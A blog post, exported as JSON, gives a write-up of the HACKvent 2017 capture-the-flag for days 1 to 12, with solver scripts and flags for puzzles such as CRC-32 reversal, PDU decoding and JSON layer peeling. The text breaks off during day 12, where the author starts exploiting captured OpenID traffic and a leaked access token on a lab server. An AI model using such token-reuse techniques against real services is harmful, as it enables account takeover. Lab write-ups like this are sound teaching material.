{"id":695,"date":"2018-01-01T02:00:07","date_gmt":"2018-01-01T02:00:07","guid":{"rendered":"http:\/\/sigterm.ch\/?p=695"},"modified":"2018-01-01T02:00:07","modified_gmt":"2018-01-01T02:00:07","slug":"hackvent-2017-write-up","status":"publish","type":"post","link":"https:\/\/sigterm.ch\/?p=695","title":{"rendered":"HACKvent 2017 write-up"},"content":{"rendered":"

Like every year before Christmas the HACKvent is on! It is a Jeopardy CTF competition in the style of an advent calendar. Every day at 00:00 a new challenge is released. It starts with easy ones and then becomes harder and harder. If you solve a challenge before the next one is released, you’ll get full points. Oh boy, the last couple of days were stressful…
\nUnfortunately I lost 1 point because I wasn’t able to submit the tamagotchi challenge on time. It was even more frustrating when I’ve found out, that it didn’t work because of a copy\/paste error.
\nNevertheless, I am very happy with the result as I still managed to finish on the 8th place! \ud83d\ude42
\n\"\"<\/a><\/p>\n

<\/h1>\n

\"\"Day 01: 5th anniversary (Author: M.)<\/h1>\n

time to have a look back<\/em><\/p>\n


\nDescription<\/strong>
\n\"\"Solution
\n<\/strong>This one was pretty straight forward. I just had to find the flags of the first days from the past 3 years. Simple Google-search was enough. Thanks “shiltemann” for the wirteups!
\nHackvent_2014<\/a>
\nHackvent_2015<\/a>
\nHackvent_2016<\/a>
\nHV17-5YRS-4evr-IJHy-oXP1-c6Lw<\/strong><\/p>\n

\n

\"\"Day 02: Wishlist (Author: avarx)<\/h1>\n

The fifth power of two<\/em><\/p>\n


\nDescription
\n<\/strong>Something happened to my wishlist, please help me.<\/p>\n

Wishlist.txt<\/a><\/p>\n

Solution
\n<\/strong>The fifth power of two is 32. After I Base64 decoded the string for 32 times the flag was revealed:
\nHV17-Th3F-1fth-Pow3-r0f2-is32
\n<\/strong><\/p>\n

\n

\"\"Day 03: Strange Logcat Entry (Author: pyth0n33)<\/h1>\n

Lost in messages<\/em><\/p>\n


\nDescription
\n<\/strong>I found those strange entries in my Android logcat, but I don’t know what it’s all about… I just want to read my messages!<\/p>\n

logcat.txt<\/a>
\n<\/strong>
\nSolution
\n<\/strong>While browsing through the logcat, the PDU log entries were very suspicious to me. PDU stands for Protocol Data Unit<\/a> and is used to communicate with base-bands on mobile phones.<\/p>\n

11-13 20:40:13.542 137 137 I DEBUG : FAILED TO SEND RAW PDU MESSAGE\nPDU Message!!\n11-13 20:40:24.044 137 137 DEBUG: I 07914400000000F001000B913173317331F300003AC7F79B0C52BEC52190F37D07D1C3EB32888E2E838CECF05907425A63B7161D1D9BB7D2F337BB459E8FD12D188CDD6E85CFE931<\/pre>\n
I used a PDU decoder<\/a> to read the message:
\nTo: +13371337133
\nMessage: Good Job! Now take the Flag: HV17-th1s-isol-dsch-00lm-agic<\/strong><\/p>\n
\n
\"\"Day 04: HoHoHo (Author: inik)<\/h1>\n
NOTE: New easyfied attachment available<\/em><\/p>\n

\nDescription<\/strong>
\nSanta has hidden something for you here<\/a>.
\nSolution<\/strong>
\nI got to know many new PDF tools with this challenge. \ud83d\ude42 In the end I could solve it with pdfwalker<\/a>. While scrolling through the content I’ve found a font called “DroidSans-HACKvent.sfd”.\"\"<\/a>Object 21 was referenced from there. I opened this object and dumped the decoded stream. The dumped sfd file could be converted to a ttf file with fontforge:<\/p>\n
$ fontforge -lang=ff -c 'Open($1); Generate($2)' \"DroidSans-HACKvent.sfd\" \"DroidSans-HACKvent.ttf\"<\/pre>\n
When opening the created ttf with fontforge the flag is presented.
\n\"\"<\/a>
\nHV17-RP7W-DU6t-Z3qA-jwBz-jItj<\/strong><\/p>\n
\n
\"\"Day 05: Only one hint (Author: HaRdLoCk)<\/h1>\n
OK, 2nd hint: Its XOR not MOD<\/em><\/p>\n

\nDescription
\n<\/strong>Here is your flag:<\/p>\n
0x69355f71
\n0xc2c8c11c
\n0xdf45873c
\n0x9d26aaff
\n0xb1b827f4
\n0x97d1acf4<\/p><\/blockquote>\n
and the one and only hint:<\/p>\n
0xFE8F9017 XOR 0x13371337<\/p><\/blockquote>\n
Solution
\n<\/strong>At first the challenge was released with a wrong description, the calculation was MOD instead of XOR. Unfortunately, this made me waste some time…
\nIf you calculate the hint you’ll get 0xedb88320 which is the polynomial representation in the CRC-32 calculation. As I learned at last years HACKvent, the CRC-32 is reversible if it’s not longer than 4 bytes. I wrote a python script which calls this script<\/a> and does the reverse calculation:<\/p>\n
import subprocess\nvalues = [\n\t\"0x69355f71\",\n\t\"0xc2c8c11c\",\n\t\"0xdf45873c\",\n\t\"0x9d26aaff\",\n\t\"0xb1b827f4\",\n\t\"0x97d1acf4\"]\nresult_string = \"\"\nfor i in values:\n\tprint(\"- Calculate Reverse CRC32 of: \" + i)\n\tproc = subprocess.Popen(['python', 'crc32.py', 'reverse', '-l', i], shell=False, stdout=subprocess.PIPE,)\n\tresult = proc.communicate()[0].splitlines()[0]\n\tresult = result[result.find(\"{\")+1:result.find(\"}\")]\n\tfor r in result.split(\", \"):\n\t\tresult_string += r[2:].decode(\"hex\")\n\tresult_string += \"-\"\nprint(\"[+] Result is: \" + result_string[:-1])<\/pre>\n
$ python sol.py\n- Calculate Reverse CRC32 of: 0x69355f71\n- Calculate Reverse CRC32 of: 0xc2c8c11c\n- Calculate Reverse CRC32 of: 0xdf45873c\n- Calculate Reverse CRC32 of: 0x9d26aaff\n- Calculate Reverse CRC32 of: 0xb1b827f4\n- Calculate Reverse CRC32 of: 0x97d1acf4\n[+] Result is: HV17-7pKs-whyz-o6wF-h4rp-Qlt6<\/pre>\n
HV17-7pKs-whyz-o6wF-h4rp-Qlt6<\/strong><\/p>\n
\n
\"\"Day 06: Santa’s journey (Author: avarx)<\/strong><\/h1>\n
Make sure Santa visits every country<\/em><\/p>\n

\nDescription<\/strong>
\nFollow Santa Claus as he makes his journey around the world.<\/p>\n
http:\/\/challenges.hackvent.hacking-lab.com:4200\/<\/a><\/p>\n
\n
Solution<\/strong><\/div>\n
When opening the link a QR code is shown. If you decode the QR code you’ll get the name of a country. The countries are presented in random order. The goal of this challenge is to visit all countries and then probably the flag will show up. I wrote a script which reloads the URL and reads the QR codes until the result is something starting with “HV17”.<\/div>\n
\n
import urllib2\nimport qrtools\nqr_code_file = \"qr.png\"\nurl = \"http:\/\/challenges.hackvent.hacking-lab.com:4200\"\nqr = qrtools.QR()\nwhile True:\n\tresponse = urllib2.urlopen(url)\n\tcountry = response.read()\n\twith open(qr_code_file, 'w') as file:\n\t\tfile.write(country)\n\tqr.decode(qr_code_file)\n\tif qr.data.startswith(\"HV17\"):\n\t\tprint(\"[+] Found: \" + qr.data)\n\t\tbreak\n\tprint(\"- Santa is in: \" + qr.data)<\/pre>\n
HV17-eCFw-J4xX-buy3-8pzG-kd3M<\/strong><\/p>\n
\n
\"\"Day 07: i know … (Author: HaRdLoCk)<\/h1>\n
… what you did last xmas<\/em><\/p>\n<\/div>\n<\/div>\n

\nDescription<\/strong>
\nWe were able to steal a file from santas computer. We are sure, he prepared a gift and there are traces for it in this file.
\nPlease help us to recover it:<\/p>\n
SANTA.FILE<\/a><\/p>\n
Solution
\n<\/strong>When I have a challenge with an unknown file the first thing I try is always Binwalk. With Binwalk I could extract the file SANTA.IMA. And when running “strings” over it, the flag was presented.<\/p>\n
$ strings SANTA.IMA | grep -i \"HV17\"\nY*C:\\Hackvent\\HV17-UCyz-0yEU-d90O-vSqS-Sd64.exe<\/pre>\n
I think there was an error in the challenge. Because the flag was there in cleartext with the chars ‘Y*’ in front. 2 lines below was the same flag but encrypted with rot13. Looks like someone wanted to remove the cleartext flag (maybe Ctrl+X?) but failed.. \ud83d\ude42<\/p>\n
Y*C:\\Hackvent\\HV17-UCyz-0yEU-d90O-vSqS-Sd64.exe\nTypey=\nRevision\nP:\\Unpxirag\\UI17-HPlm-0lRH-q90B-iFdF-Fq64.rkr<\/pre>\n
HV17-UCyz-0yEU-d90O-vSqS-Sd64<\/strong><\/p>\n
\n
\"\"Day 08: True 1337s (Author: pyth0n33)<\/h1>\n
… can read this instantly<\/em><\/p>\n

\nDescription<\/strong>
\nI found this obfuscated code on a public FTP-Server. But I don’t understand what it’s doing…<\/p>\n
True.1337<\/a><\/p>\n
Solution
\n<\/strong>To solve this I had to do a bit of python magic \ud83d\ude42
\n– I took the first part of the file with the multiple “True”s, exchanged “exec” with print. This results in:<\/p>\n
A=chr;__1337=exec;SANTA=input;FUN=print\ndef _1337(B):return A(B\/\/1337)<\/pre>\n
– Now I have the instructions for the second part
\n– I executed “A=chr” and the function definition
\n– Again, replaced “__1337=exec” with “print” and I got the next instructions:<\/p>\n
C=SANTA(\"?\")\nif C==\"1787569\":FUN(''.join(chr(ord(a) ^ ord(b)) for a,b in zip(\"{gMZF_M\nC_X\n\\ERF[X\",\"31415926535897932384626433832\")))<\/pre>\n
– C=SANTA(“?”) is C=input(“?”) according to the first instructions
\n– “FUN” is “print”, so I got:<\/p>\n
C=input(\"?\")\nif C==\"1787569\":\nprint(''.join(chr(ord(a) ^ ord(b)) for a,b in zip(\"{gMZF_M\nC_X\n\\ERF[X\",\"31415926535897932384626433832\")))<\/pre>\n
– Then I had a problem with non printable characters. Therefore I went one step back and didn’t print the instructions, but looked at the definition. I just removed the “print” in the beginning of the huge text.<\/p>\n
'\\nC=SANTA(\"?\")\\nif C==\"1787569\":FUN(\\'\\'.join(chr(ord(a) ^ ord(b)) for a,b in zip(\"{g\\x05\\x06\\x18MZ\\x07F\\x1e_M\\x0cC\\x14_\\x03X\\x0b\\x19\\\\\\x07ER\\x1eF[X\\x13\",\"31415926535897932384626433832\")))\\n'<\/pre>\n
– Assembling this together resulted in this:<\/p>\n
C=input(\"?\")\nif C==\"1787569\":\nprint(''.join(chr(ord(a) ^ ord(b)) for a,b in zip(\"{g\\x05\\x06\\x18MZ\\x07F\\x1e_M\\x0cC\\x14_\\x03X\\x0b\\x19\\\\\\x07ER\\x1eF[X\\x13\",\"31415926535897932384626433832\")))<\/pre>\n
– I don’t care about the input or anything, I just want the flag – therefore I just execute the print line:<\/p>\n
>>> print(''.join(chr(ord(a) ^ ord(b)) for a,b in zip(\"{g\\x05\\x06\\x18MZ\\x07F\\x1e_M\\x0cC\\x14_\\x03X\\x0b\\x19\\\\\\x07ER\\x1eF[X\\x13\",\"31415926535897932384626433832\")))\nHV17-th1s-ju5t-l1k3-j5sf-uck!<\/pre>\n
HV17-th1s-ju5t-l1k3-j5sf-uck!<\/strong><\/p>\n
\n
\"\"Day 09: JSONion (Author: inik)<\/h1>\n
 
\n
\nDescription<\/strong>
\n… is not really an onion. Peel it and find the flag.<\/p>\n
JSONion.zip<\/a><\/p>\n
Solution
\n<\/strong>The hardest part of this challenge was to figure out what to do at first. After some thinking I got that the JSON file tells you what to do in the “op” field. There are different operations: remap, gzip, b64, xor, rev and null. I had to read the JSON, interpret the operation and apply it on the data.
\nVery special was, that the author added a branch somewhere. If you assumed that there is always only one element in the JSON, you will end up with a fake flag! Very nice twist, inik! \ud83d\ude42 This would have been the perfect place to hide a hidden flag btw!<\/p>\n
import json\nimport base64\nimport zlib\n'''result = data[0][\"content\"]\nfor c,x in enumerate(data[0][\"mapFrom\"]):\n\tprint(\"- Replace \" + x + \" with \" + data[0][\"mapTo\"][c])\n\tresult = result.replace(x, data[0][\"mapTo\"][c])\nprint(result)'''\ndef remap(mapFrom, mapTo, content):\n\tresult = \"\"\n\tfor x in content:\n\t\ti = mapFrom.index(x)\n\t\tif i > -1:\n\t\t\tresult += mapTo[i]\n\t\telse:\n\t\t\tresult += x\n\treturn result\ndef gzip(content):\n\treturn zlib.decompress(base64.b64decode(content), 16+zlib.MAX_WBITS)\ndef b64(content):\n\treturn base64.b64decode(content)\ndef xor(content, mask):\n\tcontentb = base64.decodebytes(content.encode('ascii'))\n\tmaskb = base64.decodebytes(mask.encode('ascii'))\n\tresult = \"\"\n\tfor i in range(len(contentb)):\n\t\tresult += chr(contentb[i] ^ ord(maskb))\n\treturn result\ndef rev(strs):\n    return ''.join([strs[i] for i in range(len(strs)-1, -1, -1)])\ndata = json.load(open('jsonion.json'))\nnext_layer = \"\"\ncounter = 1\nwhile True:\n\top = data[0][\"op\"]\n\tprint(\"[+] Peeling layer \" + str(counter) + \"; Operation: \" + op)\n\t# !! There is a branch !! #\n\tif len(data) > 1:\n\t\tprint(\"[!!] Found a branch [!!]\")\n\t\tdata = json.loads(data[1][\"content\"])\n\t\tcontinue\n\tif op == \"map\":\n\t\tnext_layer = remap(data[0][\"mapFrom\"], data[0][\"mapTo\"], data[0][\"content\"])\n\telif op == \"gzip\":\n\t\tnext_layer = gzip(data[0][\"content\"])\n\telif op == \"b64\":\n\t\tnext_layer = b64(data[0][\"content\"])\n\telif op == \"nul\":\n\t\tnext_layer = data[0][\"content\"]\n\telif op == \"xor\":\n\t\tnext_layer = xor(data[0][\"content\"], data[0][\"mask\"])\n\telif op == \"rev\":\n\t\tnext_layer = rev(data[0][\"content\"])\n\telif op == \"flag\":\n\t\tprint(\"[!!] Found the flag:\")\n\t\tprint(\"--> \" + data[0][\"content\"])\n\t\tbreak\n\telse:\n\t\tprint(\"[+] New Operation not found, wrote it to file to inspect\")\n\t\twith open('layer.txt', 'w') as f:\n\t\t\tf.write(str(next_layer))\n\t\tbreak\n\tdata = json.loads(next_layer)\n\tcounter += 1<\/pre>\n
$ python sol.py\n[+] Peeling layer 1; Operation: map\n[+] Peeling layer 2; Operation: gzip\n[+] Peeling layer 3; Operation: b64\n[+] Peeling layer 4; Operation: gzip\n[+] Peeling layer 5; Operation: map\n[+] Peeling layer 6; Operation: map\n[+] Peeling layer 7; Operation: nul\n[+] Peeling layer 8; Operation: nul\n[+] Peeling layer 9; Operation: nul\n[+] Peeling layer 10; Operation: nul\n[+] Peeling layer 11; Operation: map\n[+] Peeling layer 12; Operation: map\n[+] Peeling layer 13; Operation: b64\n[+] Peeling layer 14; Operation: b64\n[+] Peeling layer 15; Operation: b64\n[+] Peeling layer 16; Operation: map\n[+] Peeling layer 17; Operation: gzip\n[+] Peeling layer 18; Operation: map\n[+] Peeling layer 19; Operation: map\n[+] Peeling layer 20; Operation: nul\n[+] Peeling layer 21; Operation: gzip\n[+] Peeling layer 22; Operation: nul\n[+] Peeling layer 23; Operation: gzip\n[+] Peeling layer 24; Operation: xor\n[+] Peeling layer 25; Operation: nul\n[+] Peeling layer 26; Operation: map\n[+] Peeling layer 27; Operation: map\n[+] Peeling layer 28; Operation: nul\n[+] Peeling layer 29; Operation: rev\n[+] Peeling layer 30; Operation: gzip\n[+] Peeling layer 31; Operation: gzip\n[+] Peeling layer 32; Operation: map\n[+] Peeling layer 33; Operation: map\n[+] Peeling layer 34; Operation: xor\n[+] Peeling layer 35; Operation: b64\n[+] Peeling layer 36; Operation: map\n[+] Peeling layer 37; Operation: map\n[+] Peeling layer 38; Operation: nul\n[+] Peeling layer 39; Operation: rev\n[+] Peeling layer 40; Operation: xor\n[+] Peeling layer 41; Operation: nul\n[+] Peeling layer 42; Operation: map\n[+] Peeling layer 43; Operation: b64\n[+] Peeling layer 44; Operation: rev\n[+] Peeling layer 45; Operation: nul\n[+] Peeling layer 46; Operation: gzip\n[+] Peeling layer 47; Operation: rev\n[+] Peeling layer 48; Operation: rev\n[+] Peeling layer 49; Operation: map\n[+] Peeling layer 50; Operation: b64\n[+] Peeling layer 51; Operation: map\n[+] Peeling layer 52; Operation: b64\n[+] Peeling layer 53; Operation: b64\n[+] Peeling layer 54; Operation: map\n[+] Peeling layer 55; Operation: rev\n[+] Peeling layer 56; Operation: nul\n[+] Peeling layer 57; Operation: xor\n[+] Peeling layer 58; Operation: gzip\n[+] Peeling layer 59; Operation: rev\n[+] Peeling layer 60; Operation: b64\n[+] Peeling layer 61; Operation: b64\n[+] Peeling layer 62; Operation: map\n[+] Peeling layer 63; Operation: xor\n[+] Peeling layer 64; Operation: gzip\n[+] Peeling layer 65; Operation: rev\n[+] Peeling layer 66; Operation: xor\n[+] Peeling layer 67; Operation: nul\n[+] Peeling layer 68; Operation: rev\n[+] Peeling layer 69; Operation: xor\n[+] Peeling layer 70; Operation: rev\n[+] Peeling layer 71; Operation: b64\n[+] Peeling layer 72; Operation: nul\n[+] Peeling layer 73; Operation: map\n[+] Peeling layer 74; Operation: xor\n[!!] Found a branch [!!]\n[+] Peeling layer 74; Operation: xor\n[+] Peeling layer 75; Operation: rev\n[+] Peeling layer 76; Operation: nul\n[+] Peeling layer 77; Operation: xor\n[+] Peeling layer 78; Operation: rev\n[+] Peeling layer 79; Operation: rev\n[+] Peeling layer 80; Operation: b64\n[+] Peeling layer 81; Operation: rev\n[+] Peeling layer 82; Operation: b64\n[+] Peeling layer 83; Operation: b64\n[+] Peeling layer 84; Operation: nul\n[+] Peeling layer 85; Operation: rev\n[+] Peeling layer 86; Operation: rev\n[+] Peeling layer 87; Operation: b64\n[+] Peeling layer 88; Operation: map\n[+] Peeling layer 89; Operation: b64\n[+] Peeling layer 90; Operation: xor\n[+] Peeling layer 91; Operation: b64\n[+] Peeling layer 92; Operation: b64\n[+] Peeling layer 93; Operation: flag\n[!!] Found the flag:\n--> HV17-Ip11-9CaB-JvCf-d5Nq-ffyi\n<\/pre>\n
HV17-Ip11-9CaB-JvCf-d5Nq-ffyi<\/strong><\/p>\n
\n
\"\"Day 10: Just play the game (Author: pyth0n33)<\/h1>\n
Haven’t you ever been bored at school?<\/em><\/p>\n

\nDescription<\/strong>
\nSanta is in trouble. He’s elves are busy playing TicTacToe. Beat them and help Sata to save christmas!<\/p>\n
nc challenges.hackvent.hacking-lab.com 1037<\/em><\/p>\n
Solution<\/strong>
\nMy python script plays “tic tac toe” against the computer. I’ve found out that 1-9-7-4 wins almost all the time. But as we have to win all the time, I also need to identify dangerous situations where I could lose and react accordingly:<\/p>\n
import socket\nimport sys\nhost = \"challenges.hackvent.hacking-lab.com\"\nport = 1037\n'''\nWinning moves 1 - 9 - 7 - 4\nNot winning all the time, but most of the time\n'''\nwinning_moves = [-1, 0, 8, 6, 3]\n#winning_moves = [-1, 2, 6, 8, 5]\ndef get_game_status(game):\n    lines = game.splitlines()\n    #print(lines)\n    if len(lines) >= 3 and (\"Congratulations\" in lines[len(lines)-4]):\n        return [lines[len(lines)-4], lines[len(lines)-2]]\n    if len(lines) >= 3 and (\"Congratulations\" in lines[len(lines)-3] or \"winner\" in lines[len(lines)-3]):\n        return lines[len(lines)-3]\n    game_status = [\n        [lines[len(lines)-11][3], lines[len(lines)-11][7], lines[len(lines)-11][11]],\n        [lines[len(lines)-8][3], lines[len(lines)-8][7], lines[len(lines)-8][11]],\n        [lines[len(lines)-5][3], lines[len(lines)-5][7], lines[len(lines)-5][11]]\n    ]\n    #print(game_status)\n    return game_status\ndef identify_danger(l):\n    danger = set([x for x in l if l.count(x) > 1])\n    if \"*\" in l and \"O\" in danger:\n        print(\"[+] Danger identified!!\")\n        return l.index(\"*\")\n    return -1\ndef identify_win_situation(l):\n    win = set([x for x in l if l.count(x) > 1])\n    if \"*\" in l and \"X\" in win:\n        print(\"[+] Win situation identified!!\")\n        return l.index(\"*\")\n    return -1\ndef get_next_move(place, i, next_move):\n    if i == -1:\n        return next_move\n    if place == \"row1\":\n        return i\n    if place == \"row2\":\n        return 3+i\n    if place == \"row3\":\n        return 6+i\n    if place == \"column1\":\n        return i+(i*2)\n    if place == \"column2\":\n        return i+(i*2)+1\n    if place == \"column3\":\n        return i+(i*2)+2\n    if place == \"dia1\":\n        return 2*i+(i*2)\n    if place == \"dia2\":\n        return (i*2)+2\ndef identify_next_move(status, m):\n    if not status or not isinstance(status[0], list):\n        return winning_moves[winning_moves.index(m)+1]\n    row1 = status[0]\n    row2 = status[1]\n    row3 = status[2]\n    column1 = [status[0][0], status[1][0], status[2][0]]\n    column2 = [status[0][1], status[1][1], status[2][1]]\n    column3 = [status[0][2], status[1][2], status[2][2]]\n    dia1 = [status[0][0], status[1][1], status[2][2]]\n    dia2 = [status[0][2], status[1][1], status[2][0]]\n    try:\n        next_move = winning_moves[winning_moves.index(m)+1]\n    except Exception as e:\n        # Maybe we came off track because of draw situation\n        next_move = 0\n    # Check for dangers\n    next_move = get_next_move(\"row1\", identify_danger(row1), next_move)\n    next_move = get_next_move(\"row2\", identify_danger(row2), next_move)\n    next_move = get_next_move(\"row3\", identify_danger(row3), next_move)\n    next_move = get_next_move(\"column1\", identify_danger(column1), next_move)\n    next_move = get_next_move(\"column2\", identify_danger(column2), next_move)\n    next_move = get_next_move(\"column3\", identify_danger(column3), next_move)\n    next_move = get_next_move(\"dia1\", identify_danger(dia1), next_move)\n    next_move = get_next_move(\"dia2\", identify_danger(dia2), next_move)\n    # Identify win situations\n    next_move = get_next_move(\"row1\", identify_win_situation(row1), next_move)\n    next_move = get_next_move(\"row2\", identify_win_situation(row2), next_move)\n    next_move = get_next_move(\"row3\", identify_win_situation(row3), next_move)\n    next_move = get_next_move(\"column1\", identify_win_situation(column1), next_move)\n    next_move = get_next_move(\"column2\", identify_win_situation(column2), next_move)\n    next_move = get_next_move(\"column3\", identify_win_situation(column3), next_move)\n    next_move = get_next_move(\"dia1\", identify_win_situation(dia1), next_move)\n    next_move = get_next_move(\"dia2\", identify_win_situation(dia2), next_move)\n    return next_move\ndef send_cmd(cmd):\n    try:\n        s.sendall(str(cmd) + \"\\n\")\n        r = s.recv(1024)\n        lines = r.splitlines()\n        print(len(lines))\n        # Error handling\n        if len(lines) != 33 and len(lines) != 23 and len(lines) != 13 and len(lines) != 24:\n            r += s.recv(1024)\n    except socket.error:\n        print(\"[!!] Socket error! Abort...\")\n        s.close()\n        sys.exit()\n    return r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.settimeout(15)\ns.connect((host, port))\n# Start the game\nsend_cmd(\"\")\nmove = 0\nres = \"\"\nwhile True:\n    # Try to win\n    move = identify_next_move(res, move-1)\n    move += 1\n    print(\"- Next move: \" + str(move))\n    res = send_cmd(move)\n    res = get_game_status(res)\n    if \"100\/100\" in res[0]:\n        print(\"[!!] We have won\")\n        print(\"--> \" + res[1])\n        break\n    if \"Congratulations\" in res or \"winner\" in res:\n        print(\"[+] \" + res)\n        print(\"-----------\\nNext round...\")\n        send_cmd(\"\")\n        move = 0\n        res = \"\"\n<\/pre>\n
HV17-y0ue-kn0w-7h4t-g4me-sure<\/strong><\/p>\n
\n
\"\"Day 11: Crypt-o-Math 2.0 (Author: HaRdLoCk)<\/h1>\n
 
\n
\nDescription
\n<\/strong>So you bruteforced last years math lessions? This time you cant escape!<\/p>\n
c = (a * b) % p\nc=0x559C8077EE6C7990AF727955B744425D3CC2D4D7D0E46F015C8958B34783\np=0x9451A6D9C114898235148F1BC7AA32901DCAE445BC3C08BA6325968F92DB\nb=0xCDB5E946CB9913616FA257418590EBCACB76FD4840FA90DE0FA78F095873<\/pre>\n
find “a” to get your flag.
\nSolution
\n<\/strong>Uh, I had to read up some math theory to solve this!! This Stackoverflow link was a good help: https:\/\/stackoverflow.com\/questions\/16044553\/solving-a-modular-equation-python<\/a>
\nI did calculate the modulo inverse and then I had to solve the equation. I documented every step in the comments of the python script:<\/p>\n
import gmpy2\n''' c = (a * b) % p '''\nc=0x559C8077EE6C7990AF727955B744425D3CC2D4D7D0E46F015C8958B34783\np=0x9451A6D9C114898235148F1BC7AA32901DCAE445BC3C08BA6325968F92DB\nb=0xCDB5E946CB9913616FA257418590EBCACB76FD4840FA90DE0FA78F095873\n'''\nhttps:\/\/stackoverflow.com\/questions\/16044553\/solving-a-modular-equation-python\nCalculate the inverse modulo\n1 = (b * inv) % p\nSolve equation:\nmultiply both sides by inverse modulo\nc * inv = (a * b * inv) % p\nc * inv = (a % p) (b * inv % p)\nc * inv = (a % p) (1)\nc * inv = a % p\nc * inv % p = a\n'''\ninv = gmpy2.invert(b,p)\na = c * inv % p\na = hex(a).lstrip(\"0x\")\nprint(str(a).decode(\"hex\"))<\/pre>\n
HV17-zQBz-AwDg-1FEL-rUE9-GKgq<\/strong><\/p>\n
\n
\"\"Day 12: giftlogistics (Author: inik)<\/h1>\n
countercomplete inmeasure<\/em><\/p>\n

\nDescription
\n<\/strong>Most passwords of Santa GiftLogistics were stolen. You find an example of the traffic for Santa’s account with password and everything. The Elves CSIRT Team detected this and made sure that everyone changed their password.
\nUnfortunately this was an incomplete countermeasure. It’s still possible to retrieve the protected user profile data where you will find the flag.<\/p>\n
Link<\/a> traffic<\/a><\/p>\n
Solution
\n<\/strong>Another nice challenge by inik.
\n– First I went through the unencrypted traffic in Wireshark
\n– I’ve found an OpenID configuration file, which looked suspicious. But I didn’t go more into detail there.<\/p>\n
{\"request_parameter_supported\":true,\"claims_parameter_supported\":false,\"introspection_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/introspect\",\"scopes_supported\":[\"openid\",\"profile\",\"email\",\"address\",\"phone\",\"offline_access\"],\"issuer\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/\",\"userinfo_encryption_enc_values_supported\":[\"A256CBC+HS512\",\"A256GCM\",\"A192GCM\",\"A128GCM\",\"A128CBC-HS256\",\"A192CBC-HS384\",\"A256CBC-HS512\",\"A128CBC+HS256\"],\"id_token_encryption_enc_values_supported\":[\"A256CBC+HS512\",\"A256GCM\",\"A192GCM\",\"A128GCM\",\"A128CBC-HS256\",\"A192CBC-HS384\",\"A256CBC-HS512\",\"A128CBC+HS256\"],\"authorization_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/authorize\",\"service_documentation\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/about\",\"request_object_encryption_enc_values_supported\":[\"A256CBC+HS512\",\"A256GCM\",\"A192GCM\",\"A128GCM\",\"A128CBC-HS256\",\"A192CBC-HS384\",\"A256CBC-HS512\",\"A128CBC+HS256\"],\"userinfo_signing_alg_values_supported\":[\"HS256\",\"HS384\",\"HS512\",\"RS256\",\"RS384\",\"RS512\",\"ES256\",\"ES384\",\"ES512\",\"PS256\",\"PS384\",\"PS512\"],\"claims_supported\":[\"sub\",\"name\",\"preferred_username\",\"given_name\",\"family_name\",\"middle_name\",\"nickname\",\"profile\",\"picture\",\"website\",\"gender\",\"zoneinfo\",\"locale\",\"updated_at\",\"birthdate\",\"email\",\"email_verified\",\"phone_number\",\"phone_number_verified\",\"address\"],\"claim_types_supported\":[\"normal\"],\"op_policy_uri\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/about\",\"token_endpoint_auth_methods_supported\":[\"client_secret_post\",\"client_secret_basic\",\"client_secret_jwt\",\"private_key_jwt\",\"none\"],\"token_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/token\",\"response_types_supported\":[\"code\",\"token\"],\"request_uri_parameter_supported\":false,\"userinfo_encryption_alg_values_supported\":[\"RSA-OAEP\",\"RSA-OAEP-256\",\"RSA1_5\"],\"grant_types_supported\":[\"authorization_code\",\"implicit\",\"urn:ietf:params:oauth:grant-type:jwt-bearer\",\"client_credentials\",\"urn:ietf:params:oauth:grant_type:redelegate\"],\"revocation_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/revoke\",\"userinfo_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/userinfo\",\"token_endpoint_auth_signing_alg_values_supported\":[\"HS256\",\"HS384\",\"HS512\",\"RS256\",\"RS384\",\"RS512\",\"ES256\",\"ES384\",\"ES512\",\"PS256\",\"PS384\",\"PS512\"],\"op_tos_uri\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/about\",\"require_request_uri_registration\":false,\"id_token_encryption_alg_values_supported\":[\"RSA-OAEP\",\"RSA-OAEP-256\",\"RSA1_5\"],\"jwks_uri\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/jwk\",\"subject_types_supported\":[\"public\",\"pairwise\"],\"id_token_signing_alg_values_supported\":[\"HS256\",\"HS384\",\"HS512\",\"RS256\",\"RS384\",\"RS512\",\"ES256\",\"ES384\",\"ES512\",\"PS256\",\"PS384\",\"PS512\",\"none\"],\"registration_endpoint\":\"http:\/\/challenges.hackvent.hacking-lab.com:7240\/giftlogistics\/register\",\"request_object_signing_alg_values_supported\":[\"HS256\",\"HS384\",\"HS512\",\"RS256\",\"RS384\",\"RS512\",\"ES256\",\"ES384\",\"ES512\",\"PS256\",\"PS384\",\"PS512\"],\"request_object_encryption_alg_values_supported\":[\"RSA-OAEP\",\"RSA-OAEP-256\",\"RSA1_5\"]}<\/pre>\n
– Going further through the traffic I’ve found a username and password, but the credentials didn’t work. As stated in the description, the CSIRT ensured everyone changed their password.
\n– I stayed on this path and found the OpenID login request and the access token which was returned.<\/p>\n
